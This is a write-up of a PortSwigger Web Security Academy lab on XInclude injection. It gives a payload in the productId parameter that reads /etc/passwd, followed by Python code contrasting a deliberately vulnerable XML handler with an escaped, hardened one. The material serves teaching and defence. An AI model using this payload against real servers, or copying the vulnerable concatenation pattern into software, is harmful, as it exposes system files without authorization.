# Lab: Exploiting `XInclude` to retrieve files
###### tags: `Portswigger Web Security Academy` `Web`
* Description: This lab has a "Check stock" feature that embeds the user input inside a server-side XML document that is subsequently parsed.
Because you don't control the entire XML document, you can't define a DTD to launch a classic XXE attack.
* Goal: To solve the lab, inject an `XInclude` statement to retrieve the contents of the /etc/passwd file.
* Hint: By default, `XInclude` will try to parse the included document as XML. Since /etc/passwd isn't valid XML, you will need to add an extra attribute to the `XInclude` directive to change this behavior.
## Background
> XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
>
> To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include.
>
> For example:
> ```xml!
> <foo xmlns:xi="http://www.w3.org/2001/XInclude">
> <xi:include parse="text" href="file:///etc/passwd"/></foo>
> ```
---
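[A Brief Analysis of XML: XInclude & XSLT](https://lonelysec.com/%E6%B7%BA%E6%9E%90xml%E4%B9%8Bxinclude-xslt/)
> XInclude can be understood as "XML include". Anyone familiar with compiled or scripting languages will know the idea well: PHP's include and the import of Python and Java all perform file inclusion.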
## Recon
In this lab, the packet does not contain XML-format data, so I can't control the DTD to launch a classic XXE attack.
Therefore, can we use XInclude?

## Exp
Just use the payload from the Background section and replace the value of `productId` with the exploit payload.
$\to$
```xml!
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
```
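
Why the payload is honoured and what stops it, as an added example that is not part of the lab or of PortSwigger's code: a hypothetical stock-check handler that concatenates input and runs an XInclude pass, beside a hardened one that escapes the value and skips XInclude. `TEMPLATE`, the function names and the loader are assumptions, and the include target is a constructed temp file rather than `/etc/passwd`.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import escape

# Hypothetical server-side document; the lab's real backend is not shown.
TEMPLATE = "<stockCheck><productId>{pid}</productId><storeId>{sid}</storeId></stockCheck>"

def permissive_loader(href, parse, encoding=None):
    """Resolve file:// hrefs the way an unrestricted XInclude processor would."""
    path = href[len("file://"):] if href.startswith("file://") else href
    if parse == "text":
        with open(path, encoding=encoding or "utf-8") as fh:
            return fh.read()
    return ET.parse(path).getroot()

def check_stock_weak(product_id, store_id):
    """Raw concatenation plus an XInclude pass: injected markup is honoured."""
    root = ET.fromstring(TEMPLATE.format(pid=product_id, sid=store_id))
    ElementInclude.include(root, loader=permissive_loader)
    return "".join(root.find("productId").itertext())

def check_stock_hardened(product_id, store_id):
    """Escape the values so they stay character data, and skip XInclude."""
    doc = TEMPLATE.format(pid=escape(product_id), sid=escape(store_id))
    root = ET.fromstring(doc)
    return "".join(root.find("productId").itertext())

def make_payload(path):
    """The page's payload, pointed at a local file instead of /etc/passwd."""
    return ('<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            f'<xi:include parse="text" href="file://{path}"/></foo>')

def demo():
    """Run both handlers against a constructed temp file; return both results."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("constructed-secret:x:0:0\n")  # constructed sample content
    try:
        payload = make_payload(fh.name)
        return check_stock_weak(payload, "1"), check_stock_hardened(payload, "1"), payload
    finally:
        os.unlink(fh.name)

if __name__ == "__main__":
    weak, hardened, _ = demo()
    print("weak    :", weak.strip())
    print("hardened:", hardened)
```

In the hardened handler the payload comes back as literal text, because the escaped `<` never becomes an `xi:include` element for any processor to act on.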